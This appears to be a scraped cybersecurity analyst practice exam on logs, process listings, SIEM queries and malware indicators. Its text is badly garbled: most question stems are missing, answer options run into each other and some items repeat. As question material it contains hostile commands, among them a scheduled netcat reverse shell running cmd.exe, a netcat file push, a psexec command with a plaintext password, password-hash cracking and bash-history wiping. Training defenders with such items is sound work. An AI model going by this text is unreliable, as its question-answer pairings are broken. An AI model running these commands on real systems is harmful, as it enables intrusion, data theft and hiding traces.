Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2020-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1
2020-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1
2020-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1
2020-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1
2020-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1
2020-07-11 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1
2020-07-11 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1
2020-07-11 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1
2020-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1
2020-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 1
2020-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 37 48125 1
2020-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1
2020-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1
2020-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1
2020-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1
2020-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1
user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt
What is the user attempting to do?
ps
, identify the process ID he should focus on:
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbusdaemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
[ 21/Jul/2020:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2020:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2020:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2020:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2020:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2020:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1
malwr.com
and receives the following information about its behavior. What type of tool is malwr.com
?
ICMP "Echo request"
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.6:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.7:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.7:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.8:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.8:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.9:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.9:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.10:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.10:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:11.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.11:0->10.1.1.1:0.0 11 924 1
root@demo:~# md5sum -c demo.md5
demo.txt: FAILED
md5sum: WARNING: 1 computed checksum did NOT match
cmd.exe
has been replaced with a malware package. Which of the following is the best way to validate her theory?
cmd.exe
to VirusTotal.cmd.exe
to a known good version.cmd.exe
to make sure its behavior is normal.Use the following scenario for questions 51–53.
Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.
sysmon
sysgraph
resmon
resgraph
wmic.exe
, powershell.exe
, or winrm.vbs
most likely indicate if you discover one or more was run on a typical end user's workstation?
Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.
The average administrator at Lucy's organization is responsible for 150–300 machines.
What danger does Lucy's alert create?
sudo
to assume root privileges, where is he most likely to find log information about what occurred?
sudoers
file/var/log/sudo
/var/log/auth.log
.bash_log
psexec \10.0.11.1 -u Administrator -p examplepw cmd.exe
tcpdump
data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What concern should Kwame have about what is happening?
Event ID 1005 MALWAREPROTECTION_SCAN_FAILED
every day at the same time. What is the most likely cause of this issue?
ps -aux | grep apache2 | grep root
apache2
.apache2
and root both appearing in the output of ps
.apache2
processes run by root.From: “John Smith, CIO” <[email protected]
> with a Received: parameter that shows mail.demo.com
[10.74.19.11].
Which of the following scenarios is most likely if demo.com
is not a domain belonging to the same owner as example.com
?
demo.com
.demo.com
.mail.demo.com
server is a trusted email forwarding partner for example.com
.Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
What service is the remote system most likely attempting to access?
[ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
select * from network-events where data.process.image.file = ‘cmd.exe’ AND data.process.parentImage.file != ‘explorer.exe’ AND data.process.action = ‘launch’
explorer.exe
typically do not launch command prompts.cmd.exe
should never launch explorer.exe
.explorer.exe
provides administrative access to systems.cmd.exe
runs as administrator by default when launched outside of Explorer.select source.name, data.process.cmd, count(*) AS hostcount
from windows-events where type = ‘sysmon’ AND
data.process.action = ‘launch’ AND data.process.image.file =
‘reg.exe’ AND data.process.parentImage.file = ‘cmd.exe’
He then queries the returned data using the following script:
select source.name, data.process.cmd, count(*) AS hostcount
from network-events where type = ‘sysmon’ AND
data.process.action = ‘launch’ AND data.process. image.file =
‘cmd.exe’ AND data.process.parentImage.file = ‘explorer.exe’
What events will Mark see?
explorer.exe
where it is launched by cmd.exe
explorer.exe
that modify cmd.exe
cmd.exe
where it is launched by reg.exe
top
ls -mem
mem
memstat
Use the following scenario and image to answer questions 122–124.
While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop
to see a graphical representation of system resource usage. She sees the information shown in the following image:
htop
?
ps
top
proc
load
term
stop
end
kill
netstat
command, John sees the following output. What should his next action be?
[minesweeper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe]
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
ln /dev/null ~/.bash_history
What action was this user attempting to perform?
/dev/null
to the Bash history /dev/null
ls -la
. What should her next action be after seeing this?
diff
against the password file.passwd
binary against a known good version.select timeInterval(date, ‘4h’), `data.login.user`,
count(distinct data.login.machine.name) as machinecount from
network-events where data.winevent.EventID = 4624 having
machinecount> 1
grep
more
less
strings
ps
, identify the process ID he should focus on:
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
diff
of /etc/shadow
and /etc/passwd
and sees the following output. What has occurred?
root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::
daemon
has been added./etc/shadow
and /etc/passwd
cannot be diff
ed to create a useful comparison./var/log/auth.log
. What is most likely occurring?
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
iptables
rule blocking root logins.sudoers
group.sshd_config
to deny root login.at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do?
netcat
every Friday at 8:30 p.m.AT
command to dial a remote host via NetBIOS.auth.log
file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Which of the following has not occurred?
Fail2ban
has blocked the SSH login attempts.nc -l -p 43501 < example.zip
What happened?
example.zip
.netcat
as a listener to push example.zip
.example.zip
.netcat
to receive example.zip
.Select source.name, destination.name, count(*) from network-events, where destination.port = ‘3389’
secpol.msc
.-rwxrw-r&—1 chuck admingroup 1232 Feb 28 16:22 myfile.txt
chuck
has read and write rights to the file; the Administrators group has read, write, and execute rights; and all other users only have read rights.admingroup
has read rights; group chuck
has read and write rights; and all users on the system can read, write, and execute the file.chuck
has read, write, and execute rights on the file. Members of admingroup
group can read and write to the file but cannot execute it, and all users on the system can read the file.admingroup
has read, write, and execute rights on the file; user chuck
has read and write rights; and all other users have read rights to the file.10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
notepad.exe
has opened a listener port on the Windows machine he is investigating. What is this an example of?
sha1sum
to generate a hash for the file and write a script to check it periodically.memstat
from the command linememctl
from the command lineHELIX KITTEN
, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN
as a threat actor of concern for her organization?
"Unit 42 has discovered a new malware family we've named
"Reaver" with ties to attackers who use SunOrcal malware.
SunOrcal activity has been documented to at least 2013, and
based on metadata surrounding some of the C2s, may have been
active as early as 2010. The new family appears to have been in
the wild since late 2016 and to date we have only identified 10
unique samples, indicating it may be sparingly used. Reaver is
also somewhat unique in the fact that its final payload is in
the form of a Control panel item, or CPL file. To date, only
0.006% of all malware seen by Palo Alto Networks employs this
technique, indicating that it is in fact fairly rare.", "Tag":
[{"colour": "#00223b", "exportable": true, "name":
"osint:source-type="blog-post""}], "disable_correlation":
false, "object_relation": null, "type": "comment"}, {"comment":
"", "category": "Persistence mechanism", "uuid": "5a0a9d47-
1c7c-4353-8523-440b950d210f", "timestamp": "1510922426",
"to_ids": false, "value": "%COMMONPROGRAMFILES%\services\",
"disable_correlation": false, "object_relation": null, "type":
"regkey"}, {"comment": "", "category": "Persistence mechanism",
"uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp":
"1510922426", "to_ids": false, "value":
"%APPDATA%\microsoft\mmc\", "disable_correlation": false,
"object_relation": null, "type": "regkey"}, {"comment": "",
"category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-
4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids":
false, "value":
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\
Shell Folders\Common Startup"
How does the Reaver malware maintain persistence?
>Executable file was dropped: C:Logsmffcae1.exe
>Child process was created, parent C:Windowssystem32cmd.exe
>mffcae1.exe connects to unusual port
>File downloaded: cx99.exe
If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?
grep
command run inside of the /users
directory by an administrative user. What will the command find?
Grep -r "sudo" /home/users/ | grep "bash.log"
sudo
command on the systemsudo
command in bash log files in user home directoriessudo
or bash.log
in user directoriesiperf
Which of these should Frank seek out to help him best protect the midsize organization he works for against unknown threats?
ifconfig
command on the Linux box that he is reviewing. He sees that the device has sent less than 4 GB of data, but his network flow logs show that the system has sent more than 20 GB. What problem has Bohai encountered?
ifconfig
resets traffic counters at 4 GB.ifconfig
only samples outbound traffic and will not provide accurate information./etc/passwd
and /etc/shadow
for unexpected accounts./home/
for new user directories./etc/sudoers
for unexpected accounts./etc/groups
for group membership issues.secpol.msc
on the Windows system she is reviewing, she sees the following settings. What important information will be missing from her logs?
tcpdump
on the system.tcpdump
on the SIEM device./bin
/
/etc
/dev
SERVICES.EXE
MALWARESCAN.EXE
WINLOGIN.EXE
LSASS.EXE
What is the reason these links were blocked?
nslookup
host
traceroute
sudo
command to carry out operations on a Linux server. What type of access is he using?